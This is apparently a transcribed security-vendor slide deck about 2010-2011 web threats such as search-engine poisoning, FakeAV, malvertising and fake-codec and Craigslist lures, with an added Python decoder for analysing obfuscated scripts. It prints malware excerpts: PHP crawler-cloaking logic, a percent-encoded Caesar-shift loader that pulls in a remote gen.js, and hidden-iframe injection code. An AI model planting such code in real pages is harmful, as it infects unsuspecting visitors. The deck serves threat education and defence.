* Web Evolution 

* Attack Techniques and Trends 

* Smarter Intelligence for Web Threats 

* Some Customer Results 

* Evolving Architecture: The Next Step 
Web Evolution 

Static Pages -> Dynamic Pages -> Interactive Pages 

Publishing Model -> Community Model 

Single Host Pages -> Multi-Host Pages 

Nice to Have -> Must Have 
Multi-Host Pages 

[Screenshot: one page assembled from content served by 6 Domains] 
Malware Identification Strategy 

A. Popular Web Site Pointers (e.g. Google, Business Week) 

B. Middle Relay Servers & Link Farms (e.g. Blogger, WordPress.com) 

C. Malware Download Hosts 

Preserve Productivity 
Paths to Malware Infection 

Infected Site 

Link Farm 

Blogs, Forums 
Search Engine Poisoning Attack Example (Hannah Montana Ownz Dad's Computer) 

[Google home page screenshot: the search box holds the misspelled query "printable hannah maontana party invitations"] 
[Google results page for the misspelled query (SafeSearch on; "Did you mean: printable hannah montana party invitations"). The results are free-printable-invitation pages on disney-stationary.com, personalizedpartyinvites.com and associatedcontent.com; the fifth result, "Hanna Montana Happy Birthday Printable Invitations", points at xdesignstudios.com/.../index.php?...hanna-montana...printable-invitations, the hijacked site examined on the following slides.] 
The page at http://safeonlinescarinerv4.com says: 

Warning!!! Your computer contains various types of vulnerabilities and threats. 

Your system requires immediate anti viruses scan! Personal Antivirus can perform fast and free virus and malicious software scan of your computer. 

[OK] [Cancel] 



© Blue Coat Systems, Inc. 2011. All Rights Reserved. 

[Screenshot of the "Personal Antivirus" fake scanner: a fake scan listing invented infections, "Your private data is under attack!", a description of a supposed Trojan, and the advice "You need to remove this threat as soon as possible!" next to a "Full system cleanup" button] 

[Cartoon: the user is pleased to have just fixed the computer (it had a virus, but they cleaned it up) and goes back to what they were doing] 

Behind the Scenes... 
Hijacked Website 

xdesignstudios.com/dir1/index.php 

Cloaking logic in index.php (the slide's pseudocode; the crawler test is left as a placeholder variable): 

if ($is_search_engine) {   // true when the request looks like a search-engine crawler 
    echo "...indexable content..."; 
} else { 
    echo '<body><script src="live.js"></script>'; 
} 

index.php is reached with keyword-stuffed ids such as: 

id=fall+printable+coloring+pages 
id=free+printable+easter+drawings 
id=disney+printable+cartoon+characters 
id=free+printable+halloween+sheets 
id=girls+free+printable+organizer 
id=in+store+printable+catherines+coupons 

Visitors that do not look like a crawler are served live.js. 
Crawler's View 

[Keyword-stuffed page served to the search-engine crawler: scraped snippets about free printable Hannah Montana / Disney birthday cards and invitations (e.g. "Free Printable Hannah Montana Birthday Party ... Montana birthday party invitation", "Hannah Montana Birthday Party Invitations - Associated Content"), followed by a block of links back into the same script:] 

</div> 

<div> 

<a href="http://xdesignstudios.com/dir1/index.php?id=[unreadable]">printable coloring pages</a> | 
<a href="http://xdesignstudios.com/dir1/index.php?id=[unreadable]">printable characters</a> | 
<a href="http://xdesignstudios.com/dir1/index.php?id=free+printable+halloween+sheets">free printable halloween sheets</a> | 
<a href="http://xdesignstudios.com/dir1/index.php?id=girls+free+printable+organizer">girls free printable organizer</a> | 
<a href="http://xdesignstudios.com/dir1/index.php?id=printable+catherines+coupons">printable Catherines coupons</a> | 
<a href="http://xdesignstudios.com/dir1/index.php?id=webkinzs+printable+coupons">webkinzs printable coupons</a> | 
<a href="http://xdesignstudios.com/dir1/index.php?id=free+printable+christmas+gift+tags">free printable Christmas gift tags</a> | 
User's Network View 

Request chain seen from the user's browser: 

index.php?id=hannah-montana-printable-birthday-invitations 
  -> live.js, which begins: 

document.write(unescape('%3C%53%43%52%49%50%54%20%20%20%20%6C%61%6E%67%75... 
<SCRIPT language="javascript"> 
// First decoding stage of live.js as recovered on the slide (OCR-broken quoting fixed). 
// zz is a percent-encoded string whose last character is a Caesar shift amount. 
function exegoole(zz) { 
    // strip the trailing shift digit and undo the outer percent-encoding 
    var yy = unescape(zz.substr(0, zz.length - 1)); 
    var xxx = ""; 
    // shift every character code down by the trailing digit ('1' coerces to 1) 
    for (var t = 0; t < yy.length; t++) 
        xxx += String.fromCharCode(yy.charCodeAt(t) - zz.substr(zz.length - 1, 1)); 
    // the shifted text is itself percent-encoded; decode it and inject it into the page 
    document.write(unescape(xxx)); 
} 
</SCRIPT> 

exegoole('%264DTDSJQU%2631mbohvbhf%264E%2633kbwbtdsjqu%2633%264Fepdvnfou/xsju 
f%2639voftdbqf%2639%2638%26364D%263664%263654%263663%26365%3A%263661%26366 
5%263631 %263631 %263631 %263631 %263631 %263631 %263631 %263631 %263631 %263665% 
26366%3A%263661%263656%26364E%263633%263685%263676%263689%263685%26363G% 
26367B%263672%263687%263672%263684%263674%263683%26367%3A%263681%263685% 
263633%263631 %263631 %263631 %263664%263663%263654%26364E%263633%263679%263 
685%263685%263681%26364B%26363G%26363G%263674%263683%263672%263674%26367 
C%263684%26367%3A%26367F%263684%26367%3A%263675%263676%26363F%263674%26 
367G%26367E%26363G%263683%263676%263675%26363G%263678%263676%26367F%2636 
3F%26367B%263684%263633%26364F%263631 %263631 %263631 %263631 %26364D%26363G 
%263664%263654%263663%26365%3A%263661%263665%26364F%2638%263%3A%263%3A 
%264C%264D0TDSJQU%264F1 '); 
<SCRIPT language="javascript"> 
document.write(unescape('%3C%53%43%52%49%50%54%20%20%20%20%20%20%20%20%20%54%59%50%45%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%20%20%53%52%43%3D%22%68%74%74%70%3A%2F%2F%63%72%61%63%6B%73%69%6E%73%69%64%65%2E%63%6F%6D%2F%72%65%64%2F%67%65%6E%2E%6A%73%22%3E%20%20%20%20%3C%2F%53%43%52%49%50%54%3E')); 
</SCRIPT> 
<SCRIPT TYPE="text/javascript" SRC="http://cracksinside.com/red/gen.js"> 
</SCRIPT> 
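To see what a live.js blob of this kind resolves to without executing it in a browser, here is an added Python re-implementation of the two decoding layers shown above (example code written for this page, not from the slides or from Blue Coat): it emulates unescape()/escape(), mirrors exegoole(), and peels the document.write(unescape()) wrapper. The sample payload is constructed by re-encoding the final script tag; only the hostname is taken from the slides.

```python
import re

# Added example (not code from the Blue Coat slides): a Python re-implementation of the
# two decoding layers shown above, so a live.js-style payload can be unwrapped offline
# instead of being run in a browser.

_UNESC = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")
_SAFE = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789@*_+-./")


def js_unescape(s):
    """Emulate JavaScript unescape(): %XX and %uXXXX become one character each;
    malformed escapes are left in place, as the browser leaves them."""
    return _UNESC.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def js_escape(s):
    """Emulate JavaScript escape(): letters, digits and @*_+-./ pass through,
    everything else becomes %XX (or %uXXXX above U+00FF)."""
    return "".join(
        c if c in _SAFE else ("%%%02X" % ord(c) if ord(c) < 256 else "%%u%04X" % ord(c))
        for c in s)


def exegoole_decode(blob):
    """Mirror of exegoole(zz) from the slide: drop the trailing shift digit, unescape,
    shift every character code down by that digit, unescape again. Returns the text
    the malware would pass to document.write()."""
    if not blob or not blob[-1].isdigit():
        raise ValueError("blob must end with a one-digit shift amount")
    shift = int(blob[-1])
    stage = js_unescape(blob[:-1])
    stage = "".join(chr(ord(c) - shift) for c in stage)
    return js_unescape(stage)


def exegoole_encode(plain, shift=1):
    """Inverse of exegoole_decode; used here only to build constructed test input."""
    shifted = "".join(chr(ord(c) + shift) for c in js_escape(plain))
    return js_escape(shifted) + str(shift)


_CALL = re.compile(r"exegoole\(\s*'([^']*)'\s*\)")
_DW = re.compile(r"document\.write\(\s*unescape\(\s*'([^']*)'\s*\)\s*\)")
_SRC = re.compile(r"<script[^>]*\bsrc\s*=\s*[\"']([^\"']+)[\"']", re.I)


def unwrap(script):
    """Peel the layers seen on the slides, exegoole('...') calls and
    document.write(unescape('...')) wrappers, until neither pattern is left.
    Each pass keeps only the decoded payloads. Returns (final_text, script_src_urls)."""
    text = script
    for _ in range(16):  # bound the number of layers; real samples nest a few times
        layers = [exegoole_decode(m.group(1)) for m in _CALL.finditer(text)]
        layers += [js_unescape(m.group(1)) for m in _DW.finditer(text)]
        if not layers:
            break
        text = "\n".join(layers)
    return text, _SRC.findall(text)


# Constructed sample mirroring the slide's chain. Only the hostname is taken from the
# slides; the encoded bytes are rebuilt here, not copied from the deck.
FINAL_TAG = '<SCRIPT TYPE="text/javascript" SRC="http://cracksinside.com/red/gen.js"></SCRIPT>'
STAGE2 = "document.write(unescape('%s'));" % js_escape(FINAL_TAG)
LIVE_JS = "exegoole('%s');" % exegoole_encode(STAGE2)

if __name__ == "__main__":
    text, urls = unwrap(LIVE_JS)
    print(text)
    print("external scripts pulled in:", urls)
```

The decoded output, and in particular the list of external script URLs, is what a gateway or analyst cares about; the hidden-script source is the indicator worth blocking.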
Red Zone Defense 

Request chain: 

index.php?id=hannah-montana-printable-birthday-invitations 
  -> live.js (document.write(unescape('%3C%53%43%52%49%50%54%20%20%20%20%6C%61%6E%67%75...'))) 
  -> http://cracksinside.com/red/gen.js 
State of Web Security 

2008-2009 (MACHINE-GUN STRATEGY) 
• Malware Blasts 
• High Growth/Volume 
• Dynamic Domains 
• Search Engine Poisoning 

2010-2011+ (RIFLE APPROACH) 
• Vulnerabilities/Exploits 
• Focused Attacks 
• Hacking Trusted Sites 
• Malvertising 
Top Categories Hosting Malware 

1. Suspicious (13% UP) 
2. Online Storage 
3. Pornography 
4. Computers/Internet 
5. Search Engines/Portals (29% UP) 
6. Open/Mixed Content 
7. Personals/Dating 
8. Web Hosting 
9. Software Downloads 
10. Phishing 
11. Entertainment 
12. Business/Economy 
13. Placeholders 
14. Audio/Video Clips 
15. Online Games 
16. Web Advertisements 
17. Shopping 
18. Hacking 
19. Peer-to-Peer/P2P 
20. Gambling 

Highlights: 

■ Hacking Trusted Sites 
• Good Reputations & Ratings 
• Less Use of Free Domains 

■ Gambling/Hacking Decrease 
• Not in the Top 15 Categories 
• Often Blocked by Policy 

■ Pornography Remains a Lure 
• Rate over 110,000 New Sites/Day 
• Requires Real-time Ratings 

■ Suspicious Rating Flags Danger 
• Obfuscation of Active Scripts 
• Modifier Category 
Top Web Attacks 

#1 FakeAV 

[Screenshot: fake "your system is infected" warning page urging the user to install "proper software"] 

• 15% of malware on the web* 
• 60% for domains with trending key words 
• 50% of malvertising malware delivery* 
• Animated flash AV scans & graphics 

#2 Fake Update 

• Video codec or software update 
• Social networking sharing of photos/videos 
• Searches for adult or pornographic material 

* Google 13 month Security Study - April 2010 
Malvertising #3 

■ Outsourced multi-tier ad networks 

■ Displaces search engine poisoning 

■ Cyber crime patience to develop trust 



[Chart: malvertising detections per month, February through December, with the monthly counts labelled on the bars] 

Web Attack Profile 

Host Domain | Traffic Pattern | Friend or Foe? 

Software Downloads 
Social Networking 
IM Attachments 
Web Mail 
P2P File Sharing 
Web 2.0 Active Content 

Malicious Mobile Code 
Malware/Trojans 
Exploit Kits 
Mal-PDFs 
Masquerading Files 
Downloader Droppers 

One web click opens the door. 
Wonderin' where the lions are? 

... They're waiting near the watering holes. 

The Bad Guys on the Web want to be where the crowds are: 

Search Engines    Video Sharing 
Social Networks   Web Ad Networks 
Blue Coat WebPulse: 
Implementing Dynamic Link Analysis 

75+ Million Users 
+2.8B Requests Per Week (400 Million per day) 

Multiple Threat Engines 
• Behavioral Analysis 
• Sandboxing/Call-home 
• Active Script Scrubbers 
• Correlation Rules 
• Machine Analysis 
• Human Raters 

ProxySG & ProxyClient Enterprise Users 
K9 Consumer Users 

Immediately Protects Blue Coat Web Gateway and Remote Users 
Customer Results 

Financial/Enterprise #1 

• 70M web reqs/hour 
• Per Day Results 

Call-Home Traffic 

Layer-1: 
• 628 - Phishing 
• 1,609 - Hacking 
• 7,861 - Spyware Effects/Privacy Concerns 
• 20,547 - Potentially Unwanted Software 
• 49,890 - Spyware/Malware Sources 
• [count unreadable] - Suspicious 

Layer-2: 
• 1,723 ProxyAV Alerts 
Financial Enterprise #2 

• 20B web reqs/mth 
• One Month Analysis 

Layer-1: 547,000+ Spyware/Malware Sources 
Layer-2: 9,000+ ProxyAV Alerts 

Over 95% of web threats blocked by cloud defense 
Evolving SWG Architecture 

Timeline 2006 through 2018. 

Stages: Gateway (On-Premise, Stand Alone, Update Cycles, Human Raters) -> Protocol/Category -> WebPulse -> Security SaaS -> Hybrid -> Service 

DEPLOYMENT   -> Hybrid 
AWARENESS    -> Collaborative 
INTELLIGENCE -> On-Demand 
ASSESSMENT   -> Real-Time 
GRANULARITY  -> Web Application 
Defense Comparison 

Production-to-Box 

• Specification 
• Engineering 
• Test / QA / Beta 
• Release Cycles 
• Customer Update 
• Regional/Global Use 
• Support Feedback 
• SRs / FRs 

Cloud-Defense 

• Specification 
• Security Experts 
• Test with Cloud Data 
• Review Results 
• Fine-tune/Feedback 
• Global Use 
Mobile Devices 

Disruptive technology... on a global scale 

• Adoption rate 3-4 times of PC 
• PC divided developed from 3rd world countries 
• Mobile enables 3rd world to catch up 
• Unites 6B people to large information flows 
• Local or national brands quickly go global 
• Economy will follow mobile trends 
• So will cybercrime... 
SEP Attack Example #2 

Fake Codec & Fake AV "Twofer" on a Hacked Site 

Take a hacked site, ...and host some pages there... 

[Screenshot: a page on the hacked site titled "FLUFFERNUTTER CAKE", laid out like a video-sharing page] 

Hidden in the HTML are the top 25 results from a Google image search on the page name as well as text from a Google search of that name. 

A quick Google search showed over 800 pages there (at the time we visited)... 

...to launch a Fake Codec attack: 

[Screenshot: fake video player page whose "video" is titled "BLUE COAT IS AWESOME"] 

Clicking on the "video" initiates a download. 

Even the Bad Guys think that Blue Coat is cool ;) 

...or a Fake AV attack: 

[Screenshot: fake antivirus "WARNING" page listing supposed infections, served from a URL that makes it look as though Google hosts it] 

It's kinda scary that it looks like Google is hosting this page. 
SEP Attack Example #3 

Drive-by Download: The Happiest Puppy Ever 

SEP Drive-by Download 

Search for "dogs and puppies"... 

[Screenshot: search results and the puppy page reached from them] 

If referrer string matches some criteria, a drive-by download of a malicious PDF is attempted. 

SEP Attack Example #4 

Fake Warez: Be Careful What You Search For... 
Fake Warez 

■ People know they're looking for shady stuff, but do it anyway... 

They think they're careful and smart enough to avoid the Bad Guys. 

[Screenshot: a warez/crack download page and the VirusTotal report on the downloaded file] 

File is way too small to be the actual game. VirusTotal had five hits: enough to confirm that it's malicious, but also to show that it wasn't widely recognized yet. 
Attack Vector: Social Networking Spam 

Old Rules For Spam Safety 

■ Be careful in e-mail: 

• Delete all "funny-looking" e-mails without opening 

• Don't open attachments from people you don't know in realistic-looking e-mails 

New Rules For Spam Safety 

■ Not just e-mail! 

• FB Wall posts, Tweets, etc. are "e-mails" 

■ Messages from "people you know" might NOT be from people you know... 

• Be very careful about clicking on links 

■ (note about e-mail outsourcers "training" people to click) 
Spam Attack Example: Changing Tactics & Payloads 

Spammed Malware Attack, pt. 1 

[Screenshot: SeaMonkey browser showing a fake 123Greetings e-card page on a hacked site, complete with a 123Greetings copyright footer. The page reads:] 

Hi its me Angela 

Please download and install the latest version Adobe Flash Player for view our site. 

I MISS you 

Best Wishes 

E-card spam leads to bogus "gotta upgrade" page on hacked site... 

Spammed Malware Attack, pt. 1 

[Screenshot: the attack site's imitation of the Adobe Flash Player download page] 

Attack site has a very nice fake Adobe page... 

...WebPulse blocked the EXE (it failed its Background Check). 

Spammed Malware Attack, pt. 2 

[Screenshot: the same fake e-card, now with an animated "I MISS YOU" GIF] 

This is the same fake e-card (still on hacked sites), but with an animated GIF added for you to look at... 

...while your browser is busily decrypting some Javascript in the background... 
Spammed Malware Attack, pt. 2 

First, you pull an iframe from another hacked site. 

[JavaScript alert showing the injected code: document.write('<iframe src="http://[hacked .co.uk site]/index..." width="10" height="10" style="visibility: hidden; position: absolute; left: 0px; top: 0px"></iframe>')] 

...and that has you pull another iFrame, from the attack server... 

[JavaScript alert showing the second injection: document.write('<iframe src="http://[attack server, a .ru host]/[...].php" width="10" height="10" style="visibility: hidden; position: absolute; left: 0px; top: 0px"></iframe>')] 

...which then tries to load a Java exploit as a drive-by download. 
[Screenshot: the obfuscated JavaScript on the attack site. It creates a <style> element with document.createElement("style") and addRule(selector, declaration), keeps its working values in CSS rules, and decodes a long array of numbers before building the iframes.] 

The Javascript that's building those iFrames is using a new technique (dynamic CSS object as local var storage)... 

...but WebPulse isn't watching the Javascript in real-time... 

...it's conducting another Background Check on the attack site, and blocking it, so the EXE is never even requested. 
"Spam" Attack Example: Fake Codec, Fake Facebook Fotos 

Fake Facebook Fotos 

■ Link in a message from your "friend" takes you to a page that's pretending to be part of Facebook. 

[Screenshot: a page on a look-alike domain imitating a Facebook photo view] 

Only 3 out of 43 scanners were able to identify the EXE as malicious that day. 

We continue to flag fake-foto attacks daily, even as the domains and payloads shift continually. 
Craigslist Malware Attack (4/26/2011 Blog) 

One of the "fake Facebook foto" guys decided to branch out, and do fake-foto attacks via bogus boat ads on Craigslist sites all over the country: 

[Screenshot: Columbia craigslist > for sale / wanted > boats, "18ft 98 procraft 180bass boat w/ trailer - $2400", dated 2011-04-26. The ad text describes a used bass boat in detail and ends with "more pictures can you see here" followed by a link to an external site.] 

I grabbed a copy of the attack file (a .scr) the day after the attack began: only 5 AV engines detected it then. Recognition at the beginning of the attack was probably lower. 

(WebPulse flagged all of the requests.) 